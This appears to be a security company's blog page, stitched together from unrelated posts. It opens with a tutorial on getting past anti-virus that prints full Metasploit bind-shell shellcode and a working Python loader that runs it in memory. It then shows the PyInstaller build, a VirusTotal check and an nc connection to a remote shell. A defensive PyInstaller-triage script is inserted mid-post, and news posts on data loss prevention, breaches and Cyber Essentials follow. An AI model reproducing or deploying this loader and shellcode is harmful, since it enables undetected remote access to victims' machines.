Execute Shellcode, Bypassing Anti-Virus…

Hello,

I am going to demonstrate a little trick that allows you to bypass anti-virus and execute shellcode. This is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell; however, any shellcode can be used. I have simply chosen this one for simplicity.

As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.

So, first of all let’s generate a Metasploit payload:

root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "\n" "," | sed s'/,//g' && echo ""
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5
root@kali:~#

Copy the line of shellcode that gets returned; we will paste it into the binary later. Be aware that if you change the payload, the above command will not work as it is, because the grep/sed chain is specific to extracting the opcodes from that payload's msfpayload output.

Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.

The following piece of Python code takes shellcode as input, allocates a new region of memory, copies the shellcode into it and finally executes it in a new thread, which is what gets it past anti-virus. This is done with the VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject calls from kernel32. Here is the Python code:

#!C:\Python27\python.exe

from ctypes import *

# Grab shellcode from the user so it's not hardcoded. Python 2's input() evaluates
# what is typed, which is why the bytes must be pasted inside single quotes.
sc = bytearray(input("Paste the shellcode inside single quotes:\n\n"))
print "\n\nRunning shellcode in memory...\n\n"

# Reserves or commits a region of pages in the virtual address space of the calling process.
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: an RWX allocation,
# which is itself one of the things memory scanners look for.
# Named ptr, not pointer: pointer is the ctypes helper used for CreateThread's last argument below.
ptr = windll.kernel32.VirtualAlloc(c_int(0),
                                   c_int(len(sc)),
                                   c_int(0x3000),
                                   c_int(0x40))

buffer = (c_char * len(sc)).from_buffer(sc)

# The RtlMoveMemory routine copies the contents of a source memory block to a destination
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(ptr),
                              buffer,
                              c_int(len(sc)))

# Creates a thread to execute within the virtual address space of the calling process,
# with the allocated buffer as its start address.
ht = windll.kernel32.CreateThread(c_int(0),
                                  c_int(0),
                                  c_int(ptr),
                                  c_int(0),
                                  c_int(0),
                                  pointer(c_int(0)))

# Waits until the specified object is in the signaled state or the time-out interval elapses.
# -1 is INFINITE, so the process stays alive for as long as the shellcode thread runs.
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, your shellcode has been injected into memory and should be running..."

Take the above Python script and compile it to a win32 executable using PyInstaller:

C:\Users\mike.evans\Desktop\AV>c:\Python27\Scripts\pyinstaller.exe -F crypter2.py
82 INFO: wrote C:\Users\mike.evans\Desktop\AV\crypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:\Users\mike.evans\Desktop\AV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
2058 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_importers.py
3628 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_archive.py
3693 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_carchive.py
3752 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:\Windows\system32\python27.dll
4450 INFO: Warnings written to C:\Users\mike.evans\Desktop\AV\build\crypter2\warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:\Users\mike.evans\Desktop\AV\dist\crypter2.exe
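The one-file EXE that PyInstaller just produced is the bootloader with a package appended to it, and that package is what an analyst unpacks to recover the bundled script when such a binary turns up. The triage helper below, added here and not part of the original post, parses the PyInstaller 2.1 CArchive layout (the cookie at the end of the file, its table of contents and the entries) from raw bytes and lists bundled scripts that reference all four APIs used by the loader above. The layout constants follow PyInstaller 2.1's pyi_carchive.py; the bundle it parses is constructed inline rather than being a real build, and build_sample_bundle, parse_bundle and flag_loader_scripts are names chosen for this example.

```python
import struct
import zlib

# PyInstaller 2.1 CArchive layout (pyi_carchive.py): a cookie at the very end
# of the EXE points back at a table of contents inside the appended package.
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8siiii64s"      # magic, package len, TOC pos, TOC len, pyvers, python lib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)
ENTRY_FMT = "!iiiiBc"          # entry len, data pos, stored len, raw len, compressed?, type code
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)

# Names the loader on this page calls; all four together in one bundled script is a
# triage signal worth a closer look, not proof of anything on its own.
LOADER_APIS = (b"VirtualAlloc", b"RtlMoveMemory", b"CreateThread", b"WaitForSingleObject")

# Constructed stand-in for a bundled script (a real bundle stores marshalled code,
# in which these API names still appear as string constants).
SAMPLE_SCRIPT = (b"from ctypes import *\n"
                 b"p = windll.kernel32.VirtualAlloc(0, 4096, 0x3000, 0x40)\n"
                 b"windll.kernel32.RtlMoveMemory(p, buf, 4096)\n"
                 b"h = windll.kernel32.CreateThread(0, 0, p, 0, 0, 0)\n"
                 b"windll.kernel32.WaitForSingleObject(h, -1)\n")

def parse_bundle(blob):
    """Return {name: (type_code, data)} for every entry in the appended archive."""
    off = blob.rfind(MAGIC)
    if off < 0 or len(blob) - off < COOKIE_SIZE:
        raise ValueError("no complete PyInstaller cookie found")
    _, pkg_len, toc_pos, toc_len, _, _ = struct.unpack_from(COOKIE_FMT, blob, off)
    pkg_start = off + COOKIE_SIZE - pkg_len      # package length counts the cookie itself
    toc = blob[pkg_start + toc_pos:pkg_start + toc_pos + toc_len]
    entries, i = {}, 0
    while i < len(toc):
        entry_len, pos, stored, _raw, cflag, typcd = struct.unpack_from(ENTRY_FMT, toc, i)
        name = toc[i + ENTRY_SIZE:i + entry_len].rstrip(b"\0").decode()
        data = blob[pkg_start + pos:pkg_start + pos + stored]
        entries[name] = (typcd.decode(), zlib.decompress(data) if cflag else data)
        i += entry_len
    return entries

def flag_loader_scripts(blob):
    """Names of bundled scripts ('s' entries) that reference all four loader APIs."""
    return sorted(name for name, (typcd, data) in parse_bundle(blob).items()
                  if typcd == "s" and all(api in data for api in LOADER_APIS))

def build_sample_bundle(script_name, script_src, compress=True):
    """Construct a one-entry bundle in the same layout (test data, not a real build)."""
    stub = b"MZ" + b"\0" * 62           # stands in for the PE bootloader
    stored = zlib.compress(script_src) if compress else script_src
    pkg = bytearray(stored)             # entry data sits at package offset 0
    toc_pos = len(pkg)
    name = script_name.encode() + b"\0"
    name += b"\0" * ((-(ENTRY_SIZE + len(name))) % 16)   # PyInstaller pads entries to 16
    pkg += struct.pack(ENTRY_FMT, ENTRY_SIZE + len(name), 0, len(stored),
                       len(script_src), int(compress), b"s") + name
    pkg += struct.pack(COOKIE_FMT, MAGIC, len(pkg) + COOKIE_SIZE, toc_pos,
                       len(pkg) - toc_pos, 27, b"python27.dll")
    return stub + bytes(pkg)
```

On a real one-file build, read the whole EXE into bytes and pass it to flag_loader_scripts; the 'z' entry (the PYZ) and 'b' binaries come back as raw data and need their own handling.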

Now we have the binary, let's check VirusTotal and see what it scores:

[VirusTotal result image]

Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:

C:\Users\mike.evans\Desktop\AV\dist>crypter2.exe
Paste the shellcode inside single quotes:

'\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5'

Running shellcode in memory...

Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:

dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\mike.evans\Desktop\AV\dist>whoami
whoami
win-2q626uv3pte\mike.evans

C:\Users\mike.evans\Desktop\AV\dist>

This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.

Data Loss Prevention Is Becoming Increasingly Complex – And there is No Simple Solution

As businesses and organisations incorporate an ever-growing number of solutions, platforms and applications into their IT operations, it goes without saying that the scope for data loss, and its prevention, rises in tandem. It’s a drum we have been banging for some time now, but two stories in the news this week further highlighted that there is more than one vector for data loss in modern business – and removing one doesn’t reduce that burden.

First up is the widely reported news that the German government is considering reverting to old-fashioned typewriters to counter the threat of the NSA snooping on sensitive communications. If indeed this goes ahead and German agencies start using typewriters for confidential documents, it will, in essence, be removing one set of data protection problems only to replace them with another. While documents will no longer be directly accessible over the internet, wearables and smartphones mean that they are only a photograph away from becoming digital. We often forget that information in paper files and documents can be just as sensitive, and prone to mishandling, as electronic data – so going offline is not a silver bullet for data loss prevention.

Also in the news this week have been reports that Android apps ask for far too many device and data permissions, leaving businesses that use them with a potential data protection headache. With applications often requiring a variety of access permissions, both businesses and employees need to be aware of what potentially sensitive data they are making accessible to people outside the organisation. For instance, if an application that requires address book access is running on a corporate device, do you really want to give that app access to your corporate address book? This obviously adds another layer to, and raises more questions about, an organisation’s data loss prevention policy.

One week’s worth of news just goes to show that all information, irrespective of format or device, needs to be considered in data security audits and should be covered by policies that govern its access, usage, storage and disposal – even if it is easier said than done!

Don’t Be Left in the Dark with Data Security

With the action easing up in Brazil this week you may have seen reports circulating about a malware attack on more than 1,000 energy companies across Europe and North America. The attack was carried out by a group of attackers known by the name of Dragonfly. Dragonfly have been in operation since 2011 and previously targeted defence and aviation companies in the USA and Canada.

Research carried out by Symantec found that Dragonfly turned its attention to energy companies in early 2013 and managed to compromise 1,000 strategically important organisations for spying purposes. Dragonfly infiltrated the organisations using phishing attempts: spam emails with infected PDFs attached, sent to senior executives. Disturbingly, if they had used the sabotage capabilities open to them, the group could have caused untold damage and disruption to the energy supply in the affected countries.

It is cause for concern that critical infrastructure could have been damaged or interfered with simply because staff were not cautious enough in their approach to suspicious emails. This attack goes to show just how important staff education about cyber-security is in protecting an organisation of any size. One uninformed employee can undo a whole security infrastructure – or even risk plunging people into darkness – with a single click.

The first rule of DLP: know where your sensitive data is

A Ponemon Institute study released this week reported that only 16% of IT security professionals know where sensitive data is located on their organization’s computer systems – leaving the overwhelming majority left guessing where their data loss prevention efforts should be directed.

The study surveyed 1,587 IT security professionals whose jobs include helping protect sensitive or confidential structured and unstructured data – with only 7% of respondents knowing the location of all sensitive unstructured data, including in emails and documents.  As such, not knowing where their organization’s sensitive or confidential data is located was identified as the biggest worry for IT security professionals, eclipsing both hacker attacks and insider threats – and rightfully so!

It should go without saying that knowing where data is located should be a prerequisite for sound IT security, but we know from our own experience that too often this isn’t the case. With the threat of data loss and cyber-attacks growing as an increasing number of criminals become digitally savvy, organisations can ill afford to be unsure where data is stored and where their efforts to protect it should be focused. We’ve said it before, and we’ll no doubt say it again: the first phase of solid Data Loss Prevention is ultimately knowing where the data is.

The full story can be found here.

600,000 Customers Data Sliced from Domino’s

You may have seen this week’s news that 600,000 customer records were stolen from pizza chain Domino’s, yet again raising questions about just how seriously large corporations and big brands are taking data protection. It is the second time in less than a month that we have seen customers’ personal details compromised after the records of 145 million people were affected by a breach of eBay’s networks.

For a period of time hackers had turned their attention away from big businesses, which were seen as too tough a target, and focused instead on smaller, less well-resourced targets. However, it would appear that in this period larger organisations have become complacent in their security practices, and hackers have been quick to re-focus their efforts onto big, data-rich organisations.

Although it is not certain exactly what records have been affected, it is staggering that the personal details of so many customers were seemingly left unencrypted and susceptible to this kind of attack – especially when you consider the warning shots that have been issued with previous high profile attacks.  The possibility that a large organisation could even consider leaving data as plain text on a server is surprising to say the least.

Businesses of all sizes should be reviewing their data handling and storage practices as a matter of urgency in the coming days and weeks to ensure that they are not unwittingly offering an easy target for hackers. You can find a more detailed comment about this from Pentura MD Steve Smith on the security portal Net Security, here.

Pentura Named as a Certified Provider for UK Cyber Essentials Scheme

We are proud to announce this week that Pentura has been named as an accredited security provider under the recently launched Cyber Essentials Scheme.  Launched last week by the UK Government, and managed and reviewed by regulator CREST, the scheme is part of UK Government’s National Cyber Security Strategy and provides an independent assessment of the essential security controls that organisations need to have in place to mitigate risks from internet-borne threats. This includes internet connected end-user devices such as desktop PCs, laptops, tablets and smartphones, and internet connected systems including email, web and application servers.

Announcing the launch Universities and Science Minister David Willetts said: “We already spend more online than any other major country in the world, and this is in no small part because Britain is already a world leader in cybersecurity. Developing this new scheme will give consumers further confidence that business and government have defences in place to protect against the most common cyber threats.”

In essence it represents a base level standard that all organisations should look at meeting, and has specifically been designed with smaller organisations in mind.  Given the ongoing battle against large scale attacks, such as Zeus and CryptoLocker, the scheme will hopefully give both consumers and businesses further confidence that the organisations they deal with have appropriate security measures and defences in place to protect against cyber threats.

If you are interested in an assessment, or getting help in improving your organisation’s security stance, please contact us: info@pentura.com

Making Staff Awareness of Security Threats an Ongoing Process

You may have seen this week that Dropbox links have become the latest vector for phishing and malware attacks to try and harvest user details and valuable business data. Given Dropbox is the leading file storage and sharing application for business this is hardly shocking.  What may be more surprising though is that these latest attacks can be more easily identified, and prevented, if staff are made aware of the potential threat.  This once again highlights the importance of user education in reducing the risk of breaches, as Pentura managing director Steve Smith comments in the article.

Whilst staff training and awareness of cyber-security threats has undoubtedly improved, a common mistake is treating it as a one off box-ticking exercise rather than a continual process.

Incidents such as these just go to demonstrate that a continual awareness programme can be as effective a line of defence as the multitude of software products that are utilised by organisations. Furthermore it really brings home that a lack of security awareness amongst staff can easily undermine all other layers of defence – and is potentially just as dangerous as the attempted attacks themselves.
